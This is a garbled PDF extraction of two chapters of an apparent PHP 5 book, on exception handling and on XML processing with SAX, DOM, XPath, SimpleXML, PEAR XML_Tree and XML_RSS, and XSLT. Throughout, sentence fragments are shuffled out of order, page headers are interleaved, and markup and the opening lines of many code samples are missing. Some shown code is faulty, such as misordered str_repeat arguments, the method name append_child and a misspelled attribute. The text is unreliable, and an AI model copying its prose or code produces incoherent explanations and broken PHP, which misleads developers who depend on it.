244 Gutmans_ch07 Page 216 Thursday, September 23, 2004 2:44 PM 216 Error Handling Chap. 7 XCEPTIONS 7.4 E 7.4.1 What Are Exceptions? Exceptions are a high-level built-in error mechanism that is new as of PHP 5. Just as for PEAR errors, the relative cost of generating exceptions is high, so use them only to notify about unexpected events. Exceptions are objects that you can “throw” to PHP. If something is ready to "catch" your exception, it is handled gracefully. If nothing catches your exception, PHP bails out with an error message like this: Fatal error: Uncaught exception 'FileException' with message 'Could ➥ not open config /home/ssb/foo/conf/my.conf' in .../My/Config.php:49 Stack trace: #0 .../My/Config.php(31): config->parseFile('my.conf') #1 .../My/prepend.inc(61): config->__construct('my.conf') #2 {main} thrown in .../My/Config.php on line 49 Although PEAR errors are loosely modeled after exceptions, they lack the execution control that exceptions provide. With PEAR errors, you always need to check if a return value is an error object, or the error does not propagate down to the original caller. With exceptions, only code that cares about a par- ticular exception needs to check for (catch) exceptions. 7.4.2 try, catch, and throw try catch, and throw . Three language constructs are used by exceptions: , To handle an exception, you need to run some code inside a try block , like this: try { $article->display(); } The try block instructs PHP to look out for exceptions generated as the code inside the block is executed. If an exception occurs, it is passed on to one or more catch blocks immediately following the try block: catch (Exception $e) { die($e->getMessage()); }

245 Gutmans_ch07 Page 217 Thursday, September 23, 2004 2:44 PM 7.4 Exceptions 217 $e seems to contain an object. It does— As you can see, the variable exceptions are actually objects, the only requirement is that it must be or Exception class implements a few methods, class. The inherit the Exception such as , that give you more details about where the origin and getMessage() cause of the exception. See Chapter 3, “PHP 5 OO Language,” the details on Exception class. the statement: To generate an exception in your own code, use the throw $fp = @fopen($filename, "r"); if (!is_resource($fp)) { throw new FileException("could not read '$filename'"); } while ($line = fgets($fp)) { ... In the previous catch example, you saw that the exception was an object. This example creates that object. There is nothing magical about this syntax; throw simply uses the specified object as part of the exception. To semantically separate various types of exceptions, you can define sub- classes of as you see fit: Exception class IO_Exception extends Exception { } class XML_Parser_Exception extends Exception { } class File_Exception extends IO_Exception { } No member variables or methods are required in the exception class; class. everything that you need is already defined in the built-in Exception PHP checks the class names in the catch statement against the exception object with a so-called is_a comparison. That is, if the exception object is an instance of the class, or an instance of a subclass, PHP executes the catch catch block. Here is an example: try { $article->display(); } catch (IO_Exception $e) { print "Some IO problem occurred!"; } catch (XML_Parser_Exception $e) { print "Bad XML input!"; }

246 Gutmans_ch07 Page 218 Thursday, September 23, 2004 2:44 PM 218 Error Handling Chap. 7 IO_Exception catch catches both and Here, the IO_Exception File_Exception IO_Exception . , because File_Exception inherits If every catch fails to capture the exception, the exception goes on to the calling function, giving the calling function the opportunity to catch it. If the exception is not caught anywhere, PHP offers a last chance: the exception-handling function. By default, PHP prints the error message, class set_exception_handler() name, and a backtrace. By calling , you can replace this built-in behavior:

247 Gutmans_ch08 Page 219 Thursday, September 23, 2004 2:45 PM CHAPTER 8 XML with PHP 5 8.1 I NTRODUCTION XML is gaining more momentum as a universal language for communication between platforms; some people even call it the “new web revolution.” XML is sometimes used as a database for storing documents, but data storage was never its primary purpose. It was developed to pass information from one sys- tem to another in a common format. XML is a tagged language. The actual data is contained in structured, tagged elements of the document. The XML document must be parsed to extract the information. Often, the information needs to be converted into another format. In this chapter, we focus on using PHP to read and transform XML documents and to use XML as communication protocol with Remote Ser- all techniques for using XML is beyond the scope of this book. vices. Providing After you finish reading this chapter, you will have learned The structure of an XML document ☞ The terminology needed to work with XML documents ☞ How to parse an XML file using the two mainstream methods: ☞ SAX and DOM ☞ How to parse a simple XML file an easier way: the PHP SimpleXML extension How to use some useful PEAR packages for XML ☞ How to convert an XML document into another format using XSLT ☞ ☞ How to share information between systems using XML 219

248 Gutmans_ch08 Page 220 Thursday, September 23, 2004 2:45 PM 220 XML with PHP 5 Chap. 8 OCABULARY 8.2 V When working with XML documents, you will encounter several terms that might be unfamiliar. The following example shows an XML document that is an XHTML document: XML Example

Moved to example.org.
foo & bar

The first line is the XML declaration; it specifies the XML version and . This combination of . In this case, the DOCTYPE , that the document type is html root tag in the XML document is PUBLIC "-// W3C//DTD XHTML 1.0 Transitional//EN" , and that a DTD (Document Type Defini- tion) for this type of document can be found at http://www.w3.org/TR/xhtml1/ describes the structure of a docu- DTD file DTD/xhtml1-transitional.dtd. A ment type. Validating parsers can use the DTD file to see whether the XML file being parsed is a valid XML file in relation to the given DTD. Not all pars- ers are validating parsers; some only care that the document is well-formed. A well-formed document conforms to the XML standard (for example, all ele- ments in the document follow the XML specifications). A valid XML docu- ment conforms to the DTD associated with the document type, as well as to the XML specifications. To check whether an XHTML (and HTML) document type is valid according to the specified document type, you can use the valida- tor available online at http://validator.w3.org. The rest of the document consists of the content itself, starting with the root node (also called ): root element

249 Gutmans_ch08 Page 221 Thursday, September 23, 2004 2:45 PM 221 8.2 Vocabulary html ) According to the XHTML 1.0 Transitional DTD, the root element ( xmlns declaration for the XHTML namespace. A namespace must contain an provides a means of mixing two separate document types into one XML docu- ment, such as embedding MathML into XHTML. The child elements of the root node follow: XML Example

Moved to example.org.
foo & bar

enclose the nested title tag that spec- and ( head tags ) The ify the title XML Example. The body tag includes the background attribute. Attributes contain extra information about a specific tag. XML standards require all attributes to have a value. Values for attributes must be enclosed with single or double quotes. Using one quoting style throughout your document is recommended specifies a background picture to be background but not required. In this case, attribute has no value. . All opening tags, such as , need a matching closing tag, such as

For elements that have no content, you can merge the opening and closing tag.


Instead of using in your document, you can use . Because some , add a space before the , so that /
browsers may have problems parsing the resulting tag is .
Some special characters cause problems in XML documents. For exam- ple, < < > > and or are used for tags, so if you use in an XML document, the character is treated as a tag. Entities were developed to enable you to use special characters in your document without using confusing XML. Entities & ) and ending with are character combinations, beginning with an ampersand ( a semicolon ( ; ), that you can use in your document instead of special charac- ters. The entity is recognized correctly and not treated as a special character. to represent to represent and . When you > > < < For instance, you can use use the entities, the characters are included in your document correctly and not treated as tags. Entities are also used to input non-ASCII characters into

250 Gutmans_ch08 Page 222 Thursday, September 23, 2004 2:45 PM 222 XML with PHP 5 Chap. 8 your XML file, for example, ë or . The entities for these two symbols are € . For a fairly complete list of entities, see http://www.w3.org/ € and ë character itself, of TR/REC-html40/sgml/entities.html. If you want to use the & & , as shown in the example XML file. course, you need to use an entity— XML 8.3 P ARSING SAX Two techniques are used for parsing XML documents in PHP: (Simple API for XML) and (Document Object Model). By using SAX, the parser DOM goes through your document and fires events for every start and stop tag or other element found in your XML document. You decide how to deal with the generated events. By using DOM, the whole XML file is parsed into a tree that you can walk through using functions from PHP. PHP 5 provides another way of parsing XML: the SimpleXML extension. But first, we explore the two mainstream methods. 8.3.1 SAX We now leave the somewhat boring theory behind and start with an example. Here, we’re parsing the example XHTML file we saw earlier. We do that by ) . First, we cre- using the XML functions available in PHP (http://php.net/xml ate a parser object: $xml = xml_parser_create('UTF-8'); The optional parameter, , denotes the encoding to use while pars- 'UTF-8' ing. When this function executes successfully, it returns an XML parser han- dle for use with all the other XML parsing functions. Because SAX works by handling events, you need to set up the handlers. In this basic example, we focus on the two most important handlers: one for start and end tags, and one for character data (content): xml_set_element_handler($xml, 'start_handler', 'end_handler'); xml_set_character_data_handler($xml, 'character_handler'); These statements set up the handlers, but they must be implemented before any actions occur. Let’s look at how the handler functions should be implemented. is passed three parameters: start_handler In the previous statement, the the XML parser object, the name of the tag, and an associative array contain- ing the attributes defined for the tag.

251 Gutmans_ch08 Page 223 Thursday, September 23, 2004 2:45 PM 8.3 Parsing XML 223 function start_handler ($xml, $tag, $attributes) { global $level; echo "\n". str_repeat(' ', $level). ">>>$tag"; foreach ($attributes as $key => $value) { echo " $key $value"; } $level++; } The tag name is passed with all characters uppercased if case folding is enabled (the default). You can turn off this behavior by setting an option on the XML parser object, as follows: xml_parser_set_option($xml, XML_OPTION_CASE_FOLDING, false); The end handler is not passed the attributes array, only the XML parser object and the tag name: function end_handler ($xml, $tag) { global $level; $level--; echo str_repeat(' ', $level, ' '). "<<<$tag; } To make our test script work, we need to implement the character han- dler to show all content. We wrap the text in this handler so that it fits nicely on our terminal screen: function character_handler ($xml, $data) { global $level; $data = split("\n", wordwrap($data, 76 – ($level * 2))); foreach ($data as $line) { echo str_repeat(($level + 1), ' '). $line. "\n"; } } After we implement all the handlers, we can start parsing our XML file: xml_parse($xml, file_get_contents('test1.xhtml'));

252 Gutmans_ch08 Page 224 Thursday, September 23, 2004 2:45 PM 224 XML with PHP 5 Chap. 8 The first part of the output of our script looks like this: >>>HTML XMLNS='http://www.w3.org/1999/xhtml' XML:LANG='en' LANG='en' || || | | >>>HEAD || || | | >>>TITLE |XML Example| << <p><span class="badge badge-info text-white mr-2">253</span> Gutmans_ch08 Page 225 Thursday, September 23, 2004 2:45 PM 8.3 Parsing XML 225 /* Trim data and dump it when there is data */ $char_data = trim($char_data); if (strlen($char_data) > 0) { echo "\n"; // Wrap it nicely, so that it fits on a terminal screen $data = split("\n", wordwrap($char_data, 76-($level *2))); foreach ($data as $line) { echo str_repeat(' ', ($level +1))."[".$line."]\n"; } } /* Clear the data in the buffer */ $char_data = ''; } /* * Handler for start tags */ function start_handler ($xml, $tag, $attributes) { global $level; /* Flush collected data from the character handler */ flush_data(); /* Dump attributes as a string */ echo "\n". str_repeat(' ', $level). "$tag"; foreach ($attributes as $key => $value) { echo " $key='$value'"; } /* Increase indentation level */ $level++; } function end_handler ($xml, $tag) { global $level; /* Flush collected data from the character handler */ flush_data(); /* Decrease indentation level and print end tag */ $level--; echo "\n". str_repeat(' ', $level). "/$tag"; } function character_handler ($xml, $data) { global $level, $char_data; /* Add the character data to the buffer */ $char_data .= ' '. $data; } ?></p> <p><span class="badge badge-info text-white mr-2">254</span> Gutmans_ch08 Page 226 Thursday, September 23, 2004 2:45 PM 226 XML with PHP 5 Chap. 8 The output looks more decent, of course: HTML XMLNS='http://www.w3.org/1999/xhtml' XML:LANG='en' LANG='en' HEAD TITLE [XML Example] /TITLE /HEAD BODY BACKGROUND='bg.png' P [Moved to] A HREF='http://example.org/' [example.org] /A [.] BR /BR [foo & bar] /P /BODY /HTML 8.3.2 DOM Parsing a simple X(HT)ML file with a SAX parser is a lot of work. Using the DOM (http://www.w3.org/TR/DOM-Level-3-Core/) method is much easier, but you pay a price—memory usage. Although it might not be noticeable in our small example, it’s definitely noticeable when you parse a 20MB XML file with the DOM method. Rather than firing events for every element in the XML file, DOM creates a tree in memory containing your XML file. Figure 8.1 shows the DOM tree that represents the file from the previous section.</p> <p><span class="badge badge-info text-white mr-2">255</span> Gutmans_ch08 Page 227 Thursday, September 23, 2004 2:45 PM 8.3 Parsing XML 227 Root Node root Content Attribute Document type html lang=en body head background=bg.png title p XML template br a Moved to: food & bar href=http://example.org example.org DOM tree. Fig. 8.1 We can show all the content without tags by walking through the tree of objects. We do so in this example by recursively going over all node children: 1 <?php 2 $dom = new DomDocument(); 3 $dom->load('test2.xml'); 4 $root = $dom->documentElement; 5 6 process_children($root); 7 8 function process_children($node) 9 { 10 $children = $node->childNodes; 11 12 foreach ($children as $elem) { 13 if ($elem->nodeType == XML_TEXT_NODE) { 14 if (strlen(trim($elem->nodeValue))) { 15 echo trim($elem->nodeValue)."\n"; 16 } } else if ($elem->nodeType == XML_ELEMENT_NODE) { 17 process_children($elem); 18 } 19</p> <p><span class="badge badge-info text-white mr-2">256</span> Gutmans_ch08 Page 228 Thursday, September 23, 2004 2:45 PM 228 XML with PHP 5 Chap. 8 } 20 21 } 22 ?> The output is the following: XML Example Moved to example.org . foo & bar The example shows some very simple DOM processing. We only read attributes of elements and do not call any methods. In line 4, we retrieve the root element of the DOM document that was loaded in line 3. For every ele- ment we encounter, we call (in lines 6 and 18), which iter- process_children() ates over the list of child nodes (line 12). If the node is a text node, we echo its value (lines 13–16) and if it’s an element, we call process_children recursively (lines 17–18). The DOM extension is more powerful than what is shown in this example. It implements almost all the functionality described in the DOM2 specification. The following example uses the getAttribute() methods of the DomElement body tag: class to return the background attribute of the 1 <?php 2 $dom = new DomDocument(); 3 $dom->load('test2.xml'); $root = $dom->documentElement; 4 5 6 process_children($root); 7 8 function process_children($node) { 9 10 $children = $node->childNodes; 11 foreach ($children as $elem) { 12 if ($elem->nodeType == XML_ELEMENT_NODE) { 13 if ($elem->nodeName == 'body') { 14 15 echo $elem->getAttributeNode('background') ➥ ->value. "\n"; 16 } 17 process_children($elem); 18 } 19 } 20 } 21 ?></p> <p><span class="badge badge-info text-white mr-2">257</span> Gutmans_ch08 Page 229 Thursday, September 23, 2004 2:45 PM 8.3 Parsing XML 229 We still need to recursively search through the tree to find the correct element, but because we know about the structure of the document, we can simplify the example: 1 <?php 2 $dom = new DomDocument(); 3 $dom->load('test2.xml'); 4 $body = $dom->documentElement->getElementsByTagName('body') ➥ ->item(0); 5 echo $body->getAttributeNode('background')->value. "\n"; 6 ?> documentElement Line 4 is the main processing line. First, we request the of the DOM document, which is the root node of the DOM tree. From that ele- by using ment, we request all child elements with tag name body getElements- . Then, we want the first item in the list (because we know that it is ByTagName tag in the file is the correct one). In line 5, we request the back- the first body attribute with getAttributeNode, and display its value by reading the ground value property. 8.3.2.1 Using XPath By using XPath, we can further simplify the previous XPath is a query language for XML documents, and it is also used in example. XSLT for matching nodes. We can use XPath to query a DOM document for certain nodes and attributes, similar to using SQL to query a database: 1 <?php 2 $dom = new DomDocument(); 3 $dom->load('test2.xml'); 4 $xpath = new DomXPath($dom); 5 $nodes = $xpath->query("*[local-name()='body']", $dom ➥ ->documentElement); 6 echo $nodes->item(0)->getAttributeNode('background')->value. "\n"; 7 ?> The DOM extension can do more than parse 8.3.2.2 Creating a DOM Tree XML. It can create an XML document from scratch. In your script, you can build a tree of objects that you can dump to disk as an XML file. This ideal way to write XML files is not easy to do from within a script, but we’re going to do it anyway. In this example, we create a file with content similar to that shown in the example XML file we used in the previous section. We cannot guarantee that the file will be exactly the same because the DOM extension might not handle the whitespace in the XML file as cleanly as a human would. Let’s start by creating the DOM object and the root node:</p> <p><span class="badge badge-info text-white mr-2">258</span> Gutmans_ch08 Page 230 Thursday, September 23, 2004 2:45 PM 230 XML with PHP 5 Chap. 8 <?php $dom = new DomDocument(); $html = $dom->createElement('html'); $html->setAttribute("xmlns", "http://www.w3.org/1999/xhtml"); $html->setAttribute("xml:lang", "en"); $html->setAttribute("lang", "en"); $dom->appendChild($html); DomDocument . All elements class is created with First, a new DomDocument() DomDocument method of the class or are created by calling the createElement() — createTextNode() for text nodes. The name of the element—in this case, html is returned. The DomElement is passed to the method, and an object of the type returned object is used to add attributes to the element. After the DomElement by calling the has been created, we add it to the DomDocument appendChild() element and a element to the html method. Then, we add the head to the title head element: $head = $dom->createElement('head'); $html->appendChild($head); $title = $dom->createElement('title'); $title->appendChild($dom->createTextNode("XML Example")); $head->appendChild($title); DomElement As before, we first create a object (for example, head) by call- ing the method of the DomDocument object, and then we add the createElement() DomElement object (for example, ) with newly created object to the existing $html background attribute. . We then add the body element with its appendChild() 'p' element, which contains the main content of our Then, we add the X(HT)ML document, as a child of the body element: /* Create the body element */ $body = $dom->createElement('body'); $body->setAttribute("backgound", "bg.png"); $html->appendChild($body); /* Create the p element */ $p = $dom->createElement('p'); $body->appendChild($p); <p> element are more complicated. It consists (in The contents of our "Moved to " ), an order) of a text element ( element, another text element <a> (our dot), the <br> element, and finally, a third text element ( "foo & bar" ):</p> <p><span class="badge badge-info text-white mr-2">259</span> Gutmans_ch08 Page 231 Thursday, September 23, 2004 2:45 PM 8.4 SimpleXML 231 /* Add the "Moved to" */ $text = $dom->createTextNode("Moved to "); $p->appendChild($text); /* Add the a */ $a = $dom->createelement('a'); $a->setAttribute("href", "http://example.org/"); $a->appendChild($dom->createTextNode("example.org")); $p->append_child($a); /* Add the ".", br and "foo & bar" */ $text = $dom->createTextNode("."); $p->appendChild($text); $br = $dom->createElement('br'); $p->appendChild($br); $text = $dom->createTextNode("foo & bar"); $p->appendChild($text); When we’re finished creating the DOM of our X(HT)ML document, we echo it to the screen: echo $dom->saveXML(); ?> The output resembles our original document, but without some of the whitespace (which is added here for readability): <?xml version="1.0"?> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>XML Example

Moved to example.org. ➥
foo & bar

8.4 S XML IMPLE The SimpleXML extension , enabled by default in PHP 5, is the easiest way to work with XML. You don’t need to remember a difficult DOM API. You just access the XML through a data structure representation. Here are its four simple rules:

260 Gutmans_ch08 Page 232 Thursday, September 23, 2004 2:45 PM 232 XML with PHP 5 Chap. 8 Properties denote element iterators. 1. 2. Numeric indices denote elements. 3. Non-numeric indices denote attributes. 4. String conversion allows access to TEXT data. By using these four rules, you can access all the data from an XML file. 8.4.1 Creating a SimpleXML Object You can create a SimpleXML object in any of three ways, as shown in this example: XML Example

Moved to example.org.

 foo 

Moved to example.org.

XML; $sx2 = simplexml_load_string($string); $sx3 = simplexml_load_dom(new DomDocument()); ?> In the first method, simplexml_load_file() opens the specified file and parses it into memory. In the second method, $string is created and passed to the function . In the third method, simplexml_load_string() simplexml_load_dom() DomDocument created with the DOM functions in imports a PHP. In all three cases, a SimpleXML object is returned. The function in SimpleXML extension has a brother in the simplexml_load_dom() DOM extension, called dom_import_simplexml() . These related functions allow

261 Gutmans_ch08 Page 233 Thursday, September 23, 2004 2:45 PM 8.4 SimpleXML 233 you to share the same XML structure between both extensions. You can, for example, modify simple documents with SimpleXML and more complicated ones with DOM. 8.4.2 Browsing SimpleXML Objects The first rule is “Properties denote element iterators,” which means that you can loop over all like this:

tags in the , body->p as $p) { } ?> The second states “Numeric indices denote elements,” which means that tag with we can access the second

body->p[1]; ?> The third rule is “Non-numeric indexes denote attributes,” which means that we can access the background attribute of the body tag with body['background']; ?> The last rule, “String conversion allows access to TEXT data,” means we can access all text data from the elements. With the following code, we echo tag (thus combining rules 2 and 4): the contents of the second

body->p[1]; ?> However, the output doesn’t show Moved to example.org. . Rather, it shows . As you can see, accessing TEXT data from a node will Moved to . include not its child nodes. You can use the asXML() method to include child nodes, but this will also add all the text. Using strip_tags() prevents this. The following example outputs Moved to example.org :

262 Gutmans_ch08 Page 234 Thursday, September 23, 2004 2:45 PM 234 XML with PHP 5 Chap. 8 body->p[1]->asXML()) . "\n"; ?> If you want to iterate over all child elements of the body node, use the method of the SimpleXML element object. The following example children() iterates over all children of : body->children() as $element) { /* do something with the element */ } ?> If you want to iterate over all the attributes of an element, the method is available to you. Let’s iterate over all the attributes of attributes() the first tag: body->p[0]->a->attributes() as $attribute) { echo $attribute . "\n"; } ?> 8.4.3 Storing SimpleXML Objects You can store a changed or manipulated structure or a subnode to disk. You asXML() use the method to do this, which you can call on any SimpleXML object: asXML()); ?> 8.5 PEAR In some cases, none of the previous techniques may be appropriate. For exam- ple, the DOM XML extension might not be available, or you might want to PEAR parse something very specific and don’t want to build a parser yourself. contains classes that deal with parsing XML, which might be useful. We’ll cover two of them: and XML_RSS . XML_Tree is useful for building XML XML_Tree documents through a tree when the DOM XML extension is not available or when you want to build a document fast without too many features. XML_RSS

263 Gutmans_ch08 Page 235 Thursday, September 23, 2004 2:45 PM 8.5 PEAR 235 RSS files are XML documents describing the last few can parse RSS files. items of (for example) a news site. 8.5.1 XML_Tree Building an XML document with is quite easy, and can be done XML_Tree when the DOM XML extension is not available. You can install this PEAR class by typing pear install XML_Tree at your command prompt. To show you and the “normal” DOM XML method, we’re the difference between XML_Trees going to build the same X(HT)ML document again. addRoot('html', '', array ( 'xmlns' => 'http://www.w3.org/1999/xhtml', 'xml:lang' => 'en', 'lang' => 'en' ) ); /* Create head and title elements */ $head =& $html->addChild('head'); $title =& $head->addChild('title', 'XML Example'); /* Create the body and p elements */ $body =& $html->addChild('body', '', array ('background' => ➥ 'bg.png')); $p =& $body->addChild('p'); /* Add the "Moved to" */ $p->addChild(NULL, "Moved to "); /* Add the a */ $p->addChild('a', 'example.org', array ('href' => ➥ 'http://example.org')); /* Add the ".", br and "foo & bar" */ $p->addChild(NULL, "."); $p->addChild('br'); $p->addChild(NULL, "foo & bar"); /* Dump the representation */ $dom->dump(); ?>

264 Gutmans_ch08 Page 236 Thursday, September 23, 2004 2:45 PM 236 XML with PHP 5 Chap. 8 As you can see, it’s much easier to add an element with attributes and (simple) content with XML_Tree . For example, look at the following line that element: adds the a element to the p $p->addChild('a', 'example.org', array ('href' => ➥ 'http://example.org')); Instead of four method calls, you can add it with a one liner. Of course, the DOM XML extension has many more features than XML_Tree , but for sim- ple tasks, we recommend this excellent PEAR Class. 8.5.2 XML_RSS RSS (RDF Site Summary, Really Simple Syndication) feeds are a common use is an XML vocabulary to describe news items, which can then be RSS of XML. ) into your own web site. PHP.net integrated (also called content syndication has an RSS feed with the latest news items at http://www.php.net/news.rss. You can find the dry specs of the RSS specification at http://web.resource.org/ rss/1.0/spec, but it’s much better to see an example. Here is part of the RSS file we’re going to parse: PHP: Hypertext Preprocessor http://www.php.net/ The PHP scripting language web site PHP 4.3.5RC1 released! http://qa.php.net/ PHP 4.3.5RC1 has been released for testing. This is ➥ the first release candidate and should have a very low number ➥ of problems and/or bugs. Nevertheless, please download and test ➥ it as much as possible on real-life applications to uncover any ➥ remaining issues. List of changes can be found in the NEWS ➥ file.

265 Gutmans_ch08 Page 237 Thursday, September 23, 2004 2:45 PM 8.5 PEAR 237 2004-01-12 PHP 5.0 Beta 3 released! http://www.php.net/downloads.php PHP 5.0 Beta 3 has been released. The third beta of PHP is also scheduled to be the last one (barring unexpected ➥ surprises). This beta incorporates dozens of bug fixes since ➥ ➥ Beta 2, better XML support and many other improvements, some of which are documented in the ChangeLog. Some of the key ➥ ➥ features of PHP 5 include: PHP 5 features the Zend Engine 2. ➥ XML support has been completely redone in PHP 5, all ➥ extensions are now focused around the excellent libxml2 ➥ library (http://www.xmlsoft.org/). SQLite has been bundled with PHP. For more information on SQLite, please visit their ➥ ➥ website. A new SimpleXML extension for easily accessing and manipulating XML as PHP objects. It can also interface with ➥ ➥ the DOM extension and vice-versa. Streams have been greatly improved, including the ability to access low-level socket ➥ ➥ operations on streams.2003-12-21< dc:date> ➥ This RSS files consists of two parts: the header, describing the site from which the content is syndicated, and a list of available items. The second part consists of the news items. We don’t want to refetch the RSS file from http:// php.net every time a user visits a page that displays this information. Thus, we’re going to add some caching. Downloading the file once a day should be sufficient because news isn’t updated more often than daily. (On php.net, other sites might have different policies.) PEAR::XML_RSS class that we installed with pear We’re going to use the . Here is the script: install XML_RSS

266 Gutmans_ch08 Page 238 Thursday, September 23, 2004 2:45 PM 238 XML with PHP 5 Chap. 8 Next, we check whether the file has been cached before and whether the cache file is too old (86,400 seconds is one day). If it doesn’t exist or is too old, we download a new copy from php.net and store it in the cache file: $r =& new XML_RSS($cache_file); $r->parse(); We instantiate the class, passing our RSS file, and call the XML_RSS parse() method. This method parses the RSS file into a structure that can be that returns an array con- fetched by other methods, such as getChannelInfo() taining the title, description, and link of the web site, as shown here: array(3) { ["title"]=> string(27) "PHP: Hypertext Preprocessor" ["link"]=> string(19) "http://www.php.net/" ["description"]=> string(35) "The PHP scripting language web site" } returns the title, description, and link of the news item. In the getItems() getItems() following code, we use the method to loop over all items and display them: foreach ($r->getItems() as $value) { echo strtoupper($value['title']). "\n"; echo wordwrap($value['description']). "\n"; echo "\t{$value['link']}\n\n"; } ?> When you run the script, you will see that it outputs the news items from the RSS file: PHP 4.3.5RC1 RELEASED! PHP 4.3.5RC1 has been released for testing. This is the first release candidate and should have a very low number of problems and/or bugs. Nevertheless, please download and test it as much as possible on real-life applications to uncover any remaining issues. List of changes can be found in the NEWS file. http://qa.php.net/

267 Gutmans_ch08 Page 239 Thursday, September 23, 2004 2:45 PM 8.6 Converting XML 239 PHP 5.0 BETA 3 RELEASED! PHP 5.0 Beta 3 has been released. The third beta of PHP is also scheduled to be the last one (barring unexpected surprises). This beta incorporates dozens of bug fixes since Beta 2, better XML support and many other improvements, some of which are documented in the ChangeLog. Some of the key features of PHP 5 include: PHP 5 features the Zend Engine 2. XML support has been completely redone in PHP 5, all extensions are now focused around the excellent libxml2 library (http://www.xmlsoft.org/). SQLite has been bundled with PHP. For more information on SQLite, please visit their website. A new SimpleXML extension for easily accessing and manipulating XML as PHP objects. It can also interface with the DOM extension and vice-versa. Streams have been greatly improved, including the ability to access low-level socket operations on streams. http://www.php.net/downloads.php XML 8.6 C ONVERTING You might want to convert an XML document into something else, such as an HTML document, a text file, or an XML file in a different format. The standard method for converting an XML document to another format is by using XSLT (eXtensible Stylesheet Language Transformations). XSLT is complex, so we are not going over all the details of the XML vocabulary. If you to learn more about XSLT, you can find the full specification at http://www.w3.org/TR/xslt. If XSLT doesn’t do what you want, you might need to resort to other solu- tions. The XML_Transformer PEAR class is one possible solution. With XML_Transformer , you can do XML transformations with PHP without the need for XSLT or external libraries. 8.6.1 XSLT To use the XSLT functions in PHP, you need to install the latest version of the libxslt library, which implements the necessary functions for transformations. If you use Windows, you can copy the libxslt.dll file from the dlls directory of the PHP distribution to a location on your path (for example, c:\winnt\system32). Enabling the extension on UNIX is done by adding -- with-xsl to your configure line and recompiling. Windows users can uncom- extension=php_xsl.dll line in the php.ini file. ment the As explained earlier, you can use XSLT to transform your XML docu- ments into another format. We’re going to transform a file similar to our RSS file into an X(HT)ML file by applying stylesheets to the XML document. Stylesheets are used for all transformations done with XSLT to map the ele- ments in the source XML file with a template for each element. The first part of the XSL stylesheet contains options for input and output. We want to output mime-type 'text/html/' in the ISO- the result as an HTML document with 8859-1 encoding. The namespace for the XSL declaration is defined as xsl ,

268 Gutmans_ch08 Page 240 Thursday, September 23, 2004 2:45 PM 240 XML with PHP 5 Chap. 8 xsl: in front of the meaning that every element related to XSL has the prefix ): xsl:output tag name (for example, The templates follow the leader section shown earlier. The match xsl:template attribute of the element is used to select elements in the docu- " elements in the document will be rdf ment. In the first template, all " matched. Because this is the root element of our document, the template is only applied once. When an element is matched by a template, the contents of xsl:template the are copied to the output document, with the exception of ele- ments belonging to the XSL namespace that have a special meaning: <xsl:value-of select="channel/title"/> The tag “returns” the value of an element or attribute select attribute. In the template shown here, the contents of specified in the tag in the the title child of the channel element is inserted into the output document. References are usually relative to the element that has been matched. If you want to include the contents of an attribute, rather than an ele- as prefix; for example, to select the " href " attribute ment, you need to add the @ <a href="http://www.example.org"></a> in <xsl:value-of , you can use select="@href"/> (providing the element that is matched by the template is the a " " element). <xsl:apply-templates/> Another special tag in the previous snippet—the tag—tells the XSL processor to continue processing child elements. <xsl:template match="channel"> <h1><xsl:value-of select="title"/></h1> <p><xsl:value-of select="description"/></p> <xsl:apply-templates select="items"/> </xsl:template></p> <p><span class="badge badge-info text-white mr-2">269</span> Gutmans_ch08 Page 241 Thursday, September 23, 2004 2:45 PM 8.6 Converting XML 241 If you don’t want to process all elements of the current matched element, you can select an element to process with the select attribute of the match attribute of the <xsl:apply-templates/> tag, similar to the <xsl:template/> tag. In the previous template, we continue processing child elements of the description type " link, " and " " only, skipping " ". items title ", " <xsl:template match="Seq"> <ul> <xsl:apply-templates/> </ul> </xsl:template> <xsl:key name="l" match="item" use="@about"/> <xsl:template match="li"> <li> <a href="#{generate-id(key('l',@resource))}"> <xsl:value-of select="key('l',@resource)/title"/> </a> </li> </xsl:template> <xsl:template match="item"> <hr/> <a name="{generate-id()}"> <h2><xsl:value-of select="title"/></h2> <p> <xsl:value-of select="description"/> </p> <p> <xsl:element name="a"> <xsl:attribute name="href"><xsl:value-of select="link"/></ ➥ xsl:attribute> <xsl:text>[more]</xsl:text> </xsl:element> </p> </a> </xsl:template> </xsl:stylesheet> childs of the The rest of the stylesheet makes a crosslink between the li " tag with the <item/> s. The XSLT magic used is beyond the scope of this items " chapter. Other interesting XSL elements in the template for " " are item <xsl:element/> <xsl:attribute/> , which enable you to use the content of a and <a href="<xsl:value-of value as an attribute for an output element. would not be valid. XML and XSL files are just forms of XML select=" link" /> documents. Instead, you need to create an element in the output document with and add the attributes with <xsl:attribute <xsl:element name="a"/> name="href"/> , as shown in the previous template.</p> <p><span class="badge badge-info text-white mr-2">270</span> Gutmans_ch08 Page 242 Thursday, September 23, 2004 2:45 PM 242 XML with PHP 5 Chap. 8 The modified RSS file is included here with all the namespace modifiers removed, which would have made the example unnecessarily complex: <?xml version="1.0" encoding="UTF-8"?> <rdf> <channel about="http://www.php.net/"> <title>PHP: Hypertext Preprocessor http://www.php.net/ The PHP scripting language web site

  • PHP 4.3.0RC4 Released http://qa.php.net/ Despite our best efforts, it was necessary to make one more ➥ release candidate, hence PHP 4.3.0RC4. PHP news feed available http://www.php.net/news.rss The news of PHP.net is available now in RSS 1.0 format via our new news.rss file. ➥ Now that we have both the stylesheet and the XML source file, we can use PHP to apply the stylesheet to the XML document. We use the XSLT func- tions with the files and php.net.xsl , and echo the output php.net-stripped.rss to screen: load("php.net.xsl"); $proc = new xsltprocessor; $xsl = $proc->importStylesheet($dom); $xml = new domDocument(); $xml->load('php.net-stripped.rss');

    271 Gutmans_ch08 Page 243 Thursday, September 23, 2004 2:45 PM 8.6 Converting XML 243 $string = $proc->transformToXml($xml); echo $string; ?> $dom->load() Tip: You can use the same loaded XSLT stylesheet from for the transformation of multiple XML documents (such as $proc->transform- ToXml($xml) ). This saves the overhead of parsing the XSLT stylesheet. When you call this script through your browser, the result is something like what is displayed in Figure 8.2. Fig. 8.2 Output of the XSLT transformation. transformToXml() In addition to the method, two more XSLT processing functions are available to convert documents: and transform- transformToDoc() ToUrl() . transformToDoc() DomDocument that can then be processed fur- outputs a ther with the standard DOM functions described earlier. transformToUri() renders to a URI, given as the second parameter to the function, as shown here:

